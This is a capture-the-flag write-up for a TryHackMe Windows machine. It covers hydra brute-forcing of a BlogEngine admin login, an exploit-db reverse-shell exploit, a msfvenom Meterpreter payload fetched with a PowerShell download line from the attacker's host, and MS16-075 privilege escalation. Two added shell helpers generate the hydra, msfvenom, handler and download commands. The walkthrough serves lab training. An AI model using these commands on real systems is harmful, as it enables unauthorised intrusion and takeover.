I received an e-mail from TryHackMe saying a new machine had been listed, so I went and checked it out. I deployed the machine from the room page and started with a port scan.
I accessed port 80, and the first question is: What's the name of the clown?
So I did a reverse image search: I saved the image of the clown and uploaded it to a reverse image search site. Opening the first Google result and reading through it a little, I found out the clown's name is Pennywise.
I started gobuster to find the directories that are accessible.
The one that caught my attention was the admin directory. It holds a login page, which we'll brute-force using hydra.
To brute-force the login page we intercept a login request with Burp Suite and use it to build the hydra syntax (path, POST body and a failure string, so hydra can tell a failed login from a successful one).
The only things we change in the POST body are the username and password fields, where we put ^USER^ in the username field and ^PASS^ in the password field; hydra substitutes each candidate pair into those placeholders.
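The following shell helper is an added example, not part of the original write-up: it turns the values read off the intercepted Burp request into the hydra http-post-form module string and refuses to proceed if either placeholder is missing (without both, hydra would "succeed" on every attempt). The login path, form body, failure marker, host and wordlist names are constructed placeholders; substitute the ones from your own capture.

```shell
#!/bin/sh
# Added example (not from the original write-up): build the hydra
# http-post-form invocation from a request captured in Burp Suite.
# The path, body, failure marker, host and wordlists below are assumed
# placeholders; replace them with the values from your own intercept.

# Turn an intercepted POST into hydra's "path:body:F=failure-string"
# module argument. ^USER^ and ^PASS^ mark where the credentials go.
# Returns 1 if the body lacks either placeholder, since hydra would then
# report every attempt as a hit.
hydra_form_spec() {
    path="$1"; body="$2"; marker="$3"
    case "$body" in
        *'^USER^'*'^PASS^'*|*'^PASS^'*'^USER^'*) ;;
        *) echo "form body must contain both ^USER^ and ^PASS^" >&2; return 1 ;;
    esac
    printf '%s:%s:%s\n' "$path" "$body" "$marker"
}

# Assemble the full command line (printed, not executed). -f stops hydra
# after the first valid username/password pair.
hydra_cmd() {
    host="$1"; userlist="$2"; passlist="$3"; spec="$4"
    printf 'hydra -f -L %s -P %s %s http-post-form "%s"\n' \
        "$userlist" "$passlist" "$host" "$spec"
}

# Usage with constructed values (the failure marker is the text the
# login page shows on a wrong password, copied from the Burp response):
spec=$(hydra_form_spec "/admin/login.aspx" "user=^USER^&pass=^PASS^&btn=Login" "F=Login failed")
hydra_cmd 10.10.10.10 users.txt pass.txt "$spec"
```

Pick the F= string from a response you have actually seen for a wrong password; if the page instead returns a distinctive string only on success, use S=<string> in its place.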
The brute-force finds a valid username and password. Once logged in, we're asked for the version of BlogEngine. In the admin panel, the About page displays the version.
To compromise the machine, we'll use a published exploit-db exploit for this BlogEngine version.
Reading the exploit, we learn that we have to upload a C# user control named PostView.ascx (its code is included in the exploit-db post; set the IP and port inside it to your listener) and then use directory traversal so the application loads it and sends us the reverse connection.
To trigger the vulnerability, browse to the trigger URL given in the exploit-db post and catch the reverse connection on your listener.
The connection is pretty unstable, so we'll upgrade it to a Meterpreter shell.
To do so, we create a msfvenom exe payload.
I tried transferring shell.exe with netcat without success, but I managed to retrieve the file with PowerShell. Before retrieving it, I had started a Python web server in the directory containing shell.exe (python -m SimpleHTTPServer 80; on Python 3 the equivalent is python3 -m http.server 80).
The PowerShell syntax I used to retrieve the file is:
powershell Invoke-WebRequest -Uri http://10.8.0.212/shell.exe -OutFile shell.exe
Create your Metasploit listener (exploit/multi/handler with the same payload, LHOST and LPORT you gave msfvenom) and wait for the incoming connection.
To receive the connection, just type the name of your payload in the Windows shell and switch back to Metasploit. In my case it's shell.exe.
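The helper below is an added example, not part of the original write-up: it derives the msfvenom command, the handler resource script and the victim-side PowerShell download line from a single set of values, so the payload type, LHOST and LPORT in the exe can never drift from what the listener expects (a mismatch is the usual reason a payload runs and nothing connects back). The payload name is a choice made here; the LHOST, LPORT and file name in the usage lines are assumptions.

```shell
#!/bin/sh
# Added example (not from the original write-up): keep the msfvenom
# payload, the Metasploit handler and the download one-liner in sync.
# PAYLOAD is chosen here; the addresses and file name passed in below
# are assumptions to be replaced with your own.

PAYLOAD="windows/meterpreter/reverse_tcp"

# msfvenom command that builds the staged exe (printed, not executed).
msfvenom_cmd() {
    lhost="$1"; lport="$2"; out="$3"
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -f exe -o %s\n' \
        "$PAYLOAD" "$lhost" "$lport" "$out"
}

# Write a resource script for the listener so its settings are taken from
# the same values as the payload. Start it with: msfconsole -q -r <file>
# ExitOnSession false keeps the handler up if the first session dies.
write_handler_rc() {
    lhost="$1"; lport="$2"; rc="$3"
    cat > "$rc" <<EOF
use exploit/multi/handler
set PAYLOAD $PAYLOAD
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
run -j
EOF
}

# Line to paste into the victim's shell once a web server (for example
# python3 -m http.server 80) is serving the exe from the attacker box.
download_cmd() {
    lhost="$1"; out="$2"
    printf 'powershell -c "Invoke-WebRequest -Uri http://%s/%s -OutFile %s"\n' \
        "$lhost" "$out" "$out"
}

# Usage with assumed values:
msfvenom_cmd 10.8.0.212 4444 shell.exe
write_handler_rc 10.8.0.212 4444 handler.rc
download_cmd 10.8.0.212 shell.exe
```

Generate the exe, start the handler from the resource script, serve the file, and only then paste the download line and run shell.exe on the target.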
Now, let's drop into a shell, run systeminfo to see the OS details, and use windows-exploit-suggester to check whether there is an exploit we can use to escalate privileges.
Copy the output into a text file inside the windows-exploit-suggester folder (the vulnerability database is fetched first with ./windows-exploit-suggester.py --update). Then run the suggester with the following syntax: ./windows-exploit-suggester.py --database <DB-NAME> --systeminfo systeminfo.txt -l (systeminfo.txt being whatever you called your text file; -l restricts the results to local exploits).
For privesc we'll use MS16-075, which also has a Metasploit module. Simply search for rotten and the module shows up. Configure the exploit (it needs the SESSION of your Meterpreter shell) and hit run.
If you type getuid you'll see that you are NT AUTHORITY\SYSTEM.
Grab the user and root flags from C:\Users\jeff\Desktop and C:\Users\Administrator\Desktop.